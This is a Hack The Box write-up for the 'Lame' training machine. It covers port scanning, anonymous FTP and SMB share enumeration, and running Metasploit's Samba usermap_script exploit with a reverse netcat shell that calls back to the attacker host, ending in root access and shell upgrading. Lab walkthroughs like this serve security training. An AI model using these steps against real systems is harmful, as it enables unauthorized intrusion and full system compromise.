SYNOPSIS

Outlining the attack path demonstrated in this writeup is much easier through a picture rather than a description, since a picture is worth a thousand words.

Attack Path - Lame

The aim of this walkthrough is to provide help with the Lame machine on the Hack The Box website. Please note that no flags are directly provided here. Moreover, be aware that this is only one of the many ways to solve the challenges.

It belongs to a series of tutorials that aim to help out with finishing the Beginner-Track challenges.

SETUP

There are a couple of ways to connect to the target machine. The one we will be using throughout this walkthrough is via the provided pwnbox.

Once our connection is taken care of, we spawn the target machine.

Additionally - even though not required - it is possible to set a local variable (only available in the current shell) containing our target host’s IP address. Once set, we can easily access it by prepending a $ to our variable name.

┌─[htb-bluewalle@htb-pwdysfiide][~/Desktop]
└──╼ $rhost=<target-hosts-ip>
┌─[htb-bluewalle@htb-pwdysfiide][~/Desktop]
└──╼ $ echo $rhost 
<target-hosts-ip>
┌─[htb-bluewalle@htb-pwdysfiide][~/Desktop]
└──╼ $

We could use the unset command to remove it after we no longer need it.

┌─[][htb-bluewalle@htb-pwdysfiide][~/Desktop]
└──╼ $unset rhost 
┌─[htb-bluewalle@htb-pwdysfiide][~/Desktop]
└──╼ $

Finally, a very simple and basic file structure used throughout this writeup for this particular pentest:

  • 1_recon –> information gathering, enumeration and scanning, active/passive recon
  • 2_exploitation –> exploits, foothold, lateral movement
  • 3_post-exploitation –> privilege-escalation, lateral movement, persistence

Generating it is can be done by the following one-liner:

mkdir 1_recon; mkdir 2_exploitation; mkdir 3_post-exploitation

INFORMATION-GATHERING

We start out with a quick connection check.

┌─[eu-dedivip-2][10.10.14.2][htb-bluewalle@htb-elmlfwe0dg][~/lame]
└──╼ []$ cd 1_recon/
┌─[eu-dedivip-2][10.10.14.2][htb-bluewalle@htb-elmlfwe0dg][~/lame/1_recon]
└──╼ []$ ping -c 4 -n -R $rhost > connection-test.txt
┌─[eu-dedivip-2][10.10.14.2][htb-bluewalle@htb-elmlfwe0dg][~/lame/1_recon]
└──╼ []$ cat connection-test.txt 
PING 10.129.179.224 (10.129.179.224) 56(124) bytes of data.
64 bytes from 10.129.179.224: icmp_seq=1 ttl=63 time=16.5 ms
RR: 	10.10.14.2
	10.129.0.1
	10.129.179.224
	10.129.179.224
	10.10.14.1
	10.10.14.2

64 bytes from 10.129.179.224: icmp_seq=2 ttl=63 time=11.4 ms	(same route)
64 bytes from 10.129.179.224: icmp_seq=3 ttl=63 time=11.1 ms	(same route)
64 bytes from 10.129.179.224: icmp_seq=4 ttl=63 time=10.9 ms	(same route)

--- 10.129.179.224 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3005ms
rtt min/avg/max/mdev = 10.946/12.480/16.489/2.320 ms
┌─[eu-dedivip-2][10.10.14.2][htb-bluewalle@htb-elmlfwe0dg][~/lame/1_recon]
└──╼ []$

Since our target is already up and running, it’s time for a nice tcp SYN and all-ports scan.

┌─[eu-dedivip-2][10.10.14.2][htb-bluewalle@htb-elmlfwe0dg][~/lame/1_recon]
└──╼ []$ nmap -Pn -sT -p- -min-rate 5000 -oN nmap-syn-allports-scan $rhost
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-26 00:55 BST
Nmap scan report for 10.129.179.224
Host is up (0.019s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT    STATE SERVICE
21/tcp  open  ftp
22/tcp  open  ssh
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Nmap done: 1 IP address (1 host up) scanned in 26.44 seconds
┌─[eu-dedivip-2][10.10.14.2][htb-bluewalle@htb-elmlfwe0dg][~/lame/1_recon]
└──╼ []$

Four ports are reported to be open. We use the default scripts and some version scanning to get more detailed information about them.

┌─[eu-dedivip-2][10.10.14.2][htb-bluewalle@htb-elmlfwe0dg][~/lame/1_recon]
└──╼ []$ nmap -Pn -sT -sC -sV -p 21,22,139,445 -oN nmap-syn-version-script-scan $rhost 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-26 00:57 BST
Nmap scan report for 10.129.179.224
Host is up (0.012s latency).

PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.14.2
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 600fcfe1c05f6a74d69024fac4d56ccd (DSA)
|_  2048 5656240f211ddea72bae61b1243de8f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h00m06s, deviation: 2h49m45s, median: 4s
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2023-05-25T19:58:07-04:00
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.07 seconds
┌─[eu-dedivip-2][10.10.14.2][htb-bluewalle@htb-elmlfwe0dg][~/lame/1_recon]
└──╼ []$

Some of the interesting bits we might take away from this report:

  • ftp anonymous login is allowed on port 21 - version vsFTPd 2.3.4
  • ssh version –> OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
  • potential smb shares | 139 –> older, on top of netbios (same network only!!)
  • potential smb shares | 445 –> newer, on top of tcp
  • os: probably Ubuntu 8.04.4 LTS (Hardy Heron)

Since guest login appears to be enabled, enumerating ftp looks like a perfect place to start.

┌─[eu-dedivip-2][10.10.14.2][htb-bluewalle@htb-elmlfwe0dg][~/lame/1_recon]
└──╼ []$ ftp $rhost 
Connected to 10.129.179.224.
220 (vsFTPd 2.3.4)
Name (10.129.179.224:root): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
226 Directory send OK.
ftp> exit
221 Goodbye.
┌─[eu-dedivip-2][10.10.14.2][htb-bluewalle@htb-elmlfwe0dg][~/lame/1_recon]
└──╼ []$ 

Sadly, it looks like the share is empty. Since ftp was a bust, we continue our recon by enumerating (quite extensively) the samba shares.

┌─[eu-dedivip-2][10.10.14.2][htb-bluewalle@htb-elmlfwe0dg][~/lame/1_recon/assets-found]
└──╼ []$ nmap -Pn --script smb-enum-domains.nse,smb-enum-groups.nse,smb-enum-processes.nse,smb-enum-services.nse,smb-enum-sessions.nse,smb-enum-shares.nse,smb-enum-users.nse -p445 $rhost
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-26 01:55 BST
Nmap scan report for 10.129.179.224
Host is up (0.013s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-users: 
|   LAME\backup (RID: 1068)
|     Full name:   backup
|     Flags:       Account disabled, Normal user account
|   LAME\bin (RID: 1004)
|     Full name:   bin
|     Flags:       Account disabled, Normal user account
|   LAME\bind (RID: 1210)
|     Flags:       Account disabled, Normal user account
|   LAME\daemon (RID: 1002)
|     Full name:   daemon
|     Flags:       Account disabled, Normal user account
|   LAME\dhcp (RID: 1202)
|     Flags:       Account disabled, Normal user account
|   LAME\distccd (RID: 1222)
|     Flags:       Account disabled, Normal user account
|   LAME\ftp (RID: 1214)
|     Flags:       Account disabled, Normal user account
|   LAME\games (RID: 1010)
|     Full name:   games
|     Flags:       Account disabled, Normal user account
|   LAME\gnats (RID: 1082)
|     Full name:   Gnats Bug-Reporting System (admin)
|     Flags:       Account disabled, Normal user account
|   LAME\irc (RID: 1078)
|     Full name:   ircd
|     Flags:       Account disabled, Normal user account
|   LAME\klog (RID: 1206)
|     Flags:       Account disabled, Normal user account
|   LAME\libuuid (RID: 1200)
|     Flags:       Account disabled, Normal user account
|   LAME\list (RID: 1076)
|     Full name:   Mailing List Manager
|     Flags:       Account disabled, Normal user account
|   LAME\lp (RID: 1014)
|     Full name:   lp
|     Flags:       Account disabled, Normal user account
|   LAME\mail (RID: 1016)
|     Full name:   mail
|     Flags:       Account disabled, Normal user account
|   LAME\man (RID: 1012)
|     Full name:   man
|     Flags:       Account disabled, Normal user account
|   LAME\msfadmin (RID: 3000)
|     Full name:   msfadmin,,,
|     Flags:       Normal user account
|   LAME\mysql (RID: 1218)
|     Full name:   MySQL Server,,,
|     Flags:       Account disabled, Normal user account
|   LAME\news (RID: 1018)
|     Full name:   news
|     Flags:       Account disabled, Normal user account
|   LAME\nobody (RID: 501)
|     Full name:   nobody
|     Flags:       Account disabled, Normal user account
|   LAME\postfix (RID: 1212)
|     Flags:       Account disabled, Normal user account
|   LAME\postgres (RID: 1216)
|     Full name:   PostgreSQL administrator,,,
|     Flags:       Account disabled, Normal user account
|   LAME\proftpd (RID: 1226)
|     Flags:       Account disabled, Normal user account
|   LAME\proxy (RID: 1026)
|     Full name:   proxy
|     Flags:       Account disabled, Normal user account
|   LAME\root (RID: 1000)
|     Full name:   root
|     Flags:       Account disabled, Normal user account
|   LAME\service (RID: 3004)
|     Full name:   ,,,
|     Flags:       Account disabled, Normal user account
|   LAME\sshd (RID: 1208)
|     Flags:       Account disabled, Normal user account
|   LAME\sync (RID: 1008)
|     Full name:   sync
|     Flags:       Account disabled, Normal user account
|   LAME\sys (RID: 1006)
|     Full name:   sys
|     Flags:       Account disabled, Normal user account
|   LAME\syslog (RID: 1204)
|     Flags:       Account disabled, Normal user account
|   LAME\telnetd (RID: 1224)
|     Flags:       Account disabled, Normal user account
|   LAME\tomcat55 (RID: 1220)
|     Flags:       Account disabled, Normal user account
|   LAME\user (RID: 3002)
|     Full name:   just a user,111,,
|     Flags:       Normal user account
|   LAME\uucp (RID: 1020)
|     Full name:   uucp
|     Flags:       Account disabled, Normal user account
|   LAME\www-data (RID: 1066)
|     Full name:   www-data
|_    Flags:       Account disabled, Normal user account
|_smb-enum-sessions: ERROR: Script execution failed (use -d to debug)
| smb-enum-shares: 
|   account_used: <blank>
|   \\10.129.179.224\ADMIN$: 
|     Type: STYPE_IPC
|     Comment: IPC Service (lame server (Samba 3.0.20-Debian))
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: <none>
|   \\10.129.179.224\IPC$: 
|     Type: STYPE_IPC
|     Comment: IPC Service (lame server (Samba 3.0.20-Debian))
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|   \\10.129.179.224\opt: 
|     Type: STYPE_DISKTREE
|     Comment: 
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|     Anonymous access: <none>
|   \\10.129.179.224\print$: 
|     Type: STYPE_DISKTREE
|     Comment: Printer Drivers
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\var\lib\samba\printers
|     Anonymous access: <none>
|   \\10.129.179.224\tmp: 
|     Type: STYPE_DISKTREE
|     Comment: oh noes!
|     Users: 1
|     Max Users: <unlimited>
|     Path: C:\tmp
|_    Anonymous access: READ/WRITE

Nmap done: 1 IP address (1 host up) scanned in 372.12 seconds
┌─[eu-dedivip-2][10.10.14.2][htb-bluewalle@htb-elmlfwe0dg][~/lame/1_recon/assets-found]
└──╼ []$

Only two users appear to be enabled: msfadmin and user. Regarding the shares, the only one we are allowed access to is the - \tmp - share (not counting - \IPC$ - usually empty or unimportant).

Interestingly enough, a quick online search reveals multiple potential attack vectors:

  • possible default credentials: msfadmin:msfadmin
  • potential msf exploit - exploit/samba/usermap_script

EXPLOITATION

Let’s fire up the metasploit framework console and then check out the aforementioned exploit.

┌─[eu-dedivip-2][10.10.14.2][htb-bluewalle@htb-elmlfwe0dg][~/lame/1_recon/assets-found]
└──╼ []$ msfconsole -q
[msf](Jobs:0 Agents:0) >> use exploit/multi/samba/usermap_script 
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
[msf](Jobs:0 Agents:0) exploit(multi/samba/usermap_script) >> info

       Name: Samba "username map script" Command Execution
     Module: exploit/multi/samba/usermap_script
   Platform: Unix
       Arch: cmd
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2007-05-14

Provided by:
  jduck <jduck@metasploit.com>

Available targets:
      Id  Name
      --  ----
  =>  0   Automatic

Check supported:
  No

Basic options:
  Name    Current Setting  Required  Description
  ----    ---------------  --------  -----------
  RHOSTS                   yes       The target host(s), see https://docs.metasploit.com/doc
                                     s/using-metasploit/basics/using-metasploit.html
  RPORT   139              yes       The target port (TCP)

Payload information:
  Space: 1024

Description:
  This module exploits a command execution vulnerability in Samba 
  versions 3.0.20 through 3.0.25rc3 when using the non-default 
  "username map script" configuration option. By specifying a username 
  containing shell meta characters, attackers can execute arbitrary 
  commands. No authentication is needed to exploit this vulnerability 
  since this option is used to map usernames prior to authentication!

References:
  https://nvd.nist.gov/vuln/detail/CVE-2007-2447
  OSVDB (34700)
  http://www.securityfocus.com/bid/23972
  http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=534
  http://samba.org/samba/security/CVE-2007-2447.html


View the full module info with the info -d command.

[msf](Jobs:0 Agents:0) exploit(multi/samba/usermap_script) >>

Once we made sure that the script does exactly what we desire, we list it’s configuration settings.

[msf](Jobs:0 Agents:0) exploit(multi/samba/usermap_script) >> show options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), see https://docs.metasploit.com/do
                                      cs/using-metasploit/basics/using-metasploit.html
   RPORT   139              yes       The target port (TCP)


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  64.227.43.138    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic



View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:0) exploit(multi/samba/usermap_script) >> 

Two of the fields need some adjusting, namely rhosts and lhost. The first refers to our target machine ($rhost), the second one to our pwnbox (attacker machine).

[msf](Jobs:0 Agents:0) exploit(multi/samba/usermap_script) >> set rhosts 10.129.179.224
rhosts => 10.129.179.224
[msf](Jobs:0 Agents:0) exploit(multi/samba/usermap_script) >> set lhost tun0
lhost => 10.10.14.2
[msf](Jobs:0 Agents:0) exploit(multi/samba/usermap_script) >>

Since no check support is available for this particular exploit, we simply ran it after the setup is finished.

[msf](Jobs:0 Agents:0) exploit(multi/samba/usermap_script) >> run

[*] Started reverse TCP handler on 10.10.14.2:4444 
[*] Command shell session 1 opened (10.10.14.2:4444 -> 10.129.179.224:51537) at 2023-05-26 02:21:48 +0100

The exploit does run successfully and provides us with a root shell to our target.

whoami
root

But this shell connection appears to be neither stable, nor interactive, so our next course of action is to upgrade it.

which python
/usr/bin/python
python -c 'import pty; pty.spawn("/bin/bash")'
root@lame:/# export TERM=xterm
export TERM=xterm
root@lame:/# clear
clear

POST-EXPLOITATION

Even though the echoing back is not turned off, it’s much more informative than before. Goofing around a bit get’s us both the user and the root flag. All that’s left for us is to simply grab them.

root@lame:/# cd /home/
cd /home/
root@lame:/home# ls -lag
ls -lag
total 24
drwxr-xr-x  6 root    4096 Mar 14  2017 .
drwxr-xr-x 21 root    4096 Oct 31  2020 ..
drwxr-xr-x  2 nogroup 4096 Mar 17  2010 ftp
drwxr-xr-x  2 makis   4096 Mar 14  2017 makis
drwxr-xr-x  2 service 4096 Apr 16  2010 service
drwxr-xr-x  3    1001 4096 May  7  2010 user
root@lame:/home# cd user
cd user
root@lame:/home/user# ls -hla
ls -hla
total 28K
drwxr-xr-x 3 1001 1001 4.0K May  7  2010 .
drwxr-xr-x 6 root root 4.0K Mar 14  2017 ..
-rw------- 1 1001 1001  165 May  7  2010 .bash_history
-rw-r--r-- 1 1001 1001  220 Mar 31  2010 .bash_logout
-rw-r--r-- 1 1001 1001 2.9K Mar 31  2010 .bashrc
-rw-r--r-- 1 1001 1001  586 Mar 31  2010 .profile
drwx------ 2 1001 1001 4.0K May  7  2010 .ssh
root@lame:/home/user# cd ../service
cd ../service
root@lame:/home/service# ls -hla
ls -hla
total 20K
drwxr-xr-x 2 service service 4.0K Apr 16  2010 .
drwxr-xr-x 6 root    root    4.0K Mar 14  2017 ..
-rw-r--r-- 1 service service  220 Apr 16  2010 .bash_logout
-rw-r--r-- 1 service service 2.9K Apr 16  2010 .bashrc
-rw-r--r-- 1 service service  586 Apr 16  2010 .profile
root@lame:/home/service# cd ../makis
cd ../makis
root@lame:/home/makis# ls -hla
ls -hla
total 28K
drwxr-xr-x 2 makis makis 4.0K Mar 14  2017 .
drwxr-xr-x 6 root  root  4.0K Mar 14  2017 ..
-rw------- 1 makis makis 1.1K Mar 14  2017 .bash_history
-rw-r--r-- 1 makis makis  220 Mar 14  2017 .bash_logout
-rw-r--r-- 1 makis makis 2.9K Mar 14  2017 .bashrc
-rw-r--r-- 1 makis makis  586 Mar 14  2017 .profile
-rw-r--r-- 1 makis makis    0 Mar 14  2017 .sudo_as_admin_successful
-rw-r--r-- 1 makis makis   33 May 25 19:16 user.txt
root@lame:/home/makis# cat user.txt
cat user.txt
<user-flag>
root@lame:/home/makis# cd /root/
cd /root/
root@lame:/root# ls -hla
ls -hla
total 80K
drwxr-xr-x 13 root root 4.0K May 25 19:16 .
drwxr-xr-x 21 root root 4.0K Oct 31  2020 ..
-rw-------  1 root root  373 May 25 19:16 .Xauthority
lrwxrwxrwx  1 root root    9 May 14  2012 .bash_history -> /dev/null
-rw-r--r--  1 root root 2.2K Oct 20  2007 .bashrc
drwx------  3 root root 4.0K May 20  2012 .config
drwx------  2 root root 4.0K May 20  2012 .filezilla
drwxr-xr-x  5 root root 4.0K May 25 19:16 .fluxbox
drwx------  2 root root 4.0K May 20  2012 .gconf
drwx------  2 root root 4.0K May 20  2012 .gconfd
drwxr-xr-x  2 root root 4.0K May 20  2012 .gstreamer-0.10
drwx------  4 root root 4.0K May 20  2012 .mozilla
-rw-r--r--  1 root root  141 Oct 20  2007 .profile
drwx------  5 root root 4.0K May 20  2012 .purple
-rwx------  1 root root    4 May 20  2012 .rhosts
drwxr-xr-x  2 root root 4.0K May 20  2012 .ssh
drwx------  2 root root 4.0K May 25 19:16 .vnc
drwxr-xr-x  2 root root 4.0K May 20  2012 Desktop
-rwx------  1 root root  401 May 20  2012 reset_logs.sh
-rw-------  1 root root   33 May 25 19:16 root.txt
-rw-r--r--  1 root root  118 May 25 19:16 vnc.log
root@lame:/root# cat root.txt
cat root.txt
<root-flag>
root@lame:/root#

Congratulations, we just successfully pwned the target machine. All that’s left for us now is to simply terminate the target box (if not terminated automatically) before we continue with the next box!